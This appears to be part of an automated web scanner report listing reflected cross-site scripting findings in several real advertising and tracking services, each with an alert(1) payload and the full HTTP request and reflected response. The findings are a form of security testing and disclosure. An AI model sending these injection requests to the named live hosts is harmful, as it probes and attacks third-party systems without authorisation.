The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0d5b"-alert(1)-"4f51d7bed73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&b0d5b"-alert(1)-"4f51d7bed73=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599382601;key=key1+key2+key3+key4;nodecode=yes;link=&b0d5b"-alert(1)-"4f51d7bed73=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink
...[SNIP]...

4.14. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7beee'-alert(1)-'f8a39a000c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&7beee'-alert(1)-'f8a39a000c8=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599384152;key=key1+key2+key3+key4;nodecode=yes;link=&7beee'-alert(1)-'f8a39a000c8=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(i
...[SNIP]...

4.15. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44b21"-alert(1)-"24010b6fd5a was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=44b21"-alert(1)-"24010b6fd5a HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599803020;key=key1+key2+key3+key4;nodecode=yes;link=44b21"-alert(1)-"24010b6fd5a") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|9
...[SNIP]...

4.16. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5b2a'-alert(1)-'76580ad7740 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=f5b2a'-alert(1)-'76580ad7740 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
!="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599805634;key=key1+key2+key3+key4;nodecode=yes;link=f5b2a'-alert(1)-'76580ad7740')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(isN
...[SNIP]...

4.17. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca286"-alert(1)-"e3c10b470be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&ca286"-alert(1)-"e3c10b470be=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599813136;key=key1+key2+key3+key4;nodecode=yes;link=&ca286"-alert(1)-"e3c10b470be=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink
...[SNIP]...

4.18. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fff1'-alert(1)-'90730b7d240 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&8fff1'-alert(1)-'90730b7d240=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599814481;key=key1+key2+key3+key4;nodecode=yes;link=&8fff1'-alert(1)-'90730b7d240=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(i
...[SNIP]...

4.19. http://api.bizographics.com/v2/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v2/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 62f3a<script>alert(1)</script>1d58073aa6e was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/profile.redirect?api_key=1be3a6866fd64648a7b0c808e855170262f3a<script>alert(1)</script>1d58073aa6e&group_delimiter=,&industry_delimiter=,&functional_area_delimiter=,&callback_url=http://aud.pubmatic.com/AdServer/Artemis?dpid=7 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=26071&s=26072&a=21044
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 03 Oct 2011 00:13:27 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=626db0cb-3cd9-459b-b19f-8fbed9cce7e8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (1be3a6866fd64648a7b0c808e855170262f3a<script>alert(1)</script>1d58073aa6e)

4.20. http://api.wipmania.com/jsonp [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.wipmania.com
Path:   /jsonp

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d34b6<script>alert(1)</script>48f0c9a2585 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonp?callback=jsonp1317602099166d34b6<script>alert(1)</script>48f0c9a2585&_=1317602106543 HTTP/1.1
Host: api.wipmania.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:35:11 GMT
Content-Type: application/x-javascript
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 198

jsonp1317602099166d34b6<script>alert(1)</script>48f0c9a2585({"latitude":"44.9718","longitude":"-113.3405","zoom":3,"address":{"city":"-","country":"United States","country_code":"US","region":"-"}})

4.21. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8dc7c<script>alert(1)</script>a181b15a895 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction8dc7c<script>alert(1)</script>a181b15a895&n=ar_int_p119936314&1317599990670 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:01:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction8dc7c<script>alert(1)</script>a181b15a895("");

4.22. http://as.chango.com/links/adunit/1.31759988192e+12 [adpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the adpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b14f"><script>alert(1)</script>63d7f247e9a was submitted in the adpos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=07b14f"><script>alert(1)</script>63d7f247e9a&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "9dedf6fa7c3e35355f673e63293624ee42b80e94"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:58:49 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:49 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:49 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
on&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=07b14f"><script>alert(1)</script>63d7f247e9a&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
...[SNIP]...

4.23. http://as.chango.com/links/adunit/1.31759988192e+12 [atype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb5ee"><script>alert(1)</script>a99bc9549b1 was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORICcb5ee"><script>alert(1)</script>a99bc9549b1&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "5b2700f3bc17003c1b06ba969270be02e1b1af91"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:58:55 GMT
Content-Length: 2364
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:55 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:55 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
27704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORICcb5ee"><script>alert(1)</script>a99bc9549b1&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
...[SNIP]...

4.24. http://as.chango.com/links/adunit/1.31759988192e+12 [bidder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the bidder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14194"><script>alert(1)</script>1438e1bd2b4 was submitted in the bidder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west14194"><script>alert(1)</script>1438e1bd2b4&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "94e76ad5f7c529cdda89711f9bf9ce49199412b1"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:58:59 GMT
Content-Length: 2364
Connection: close
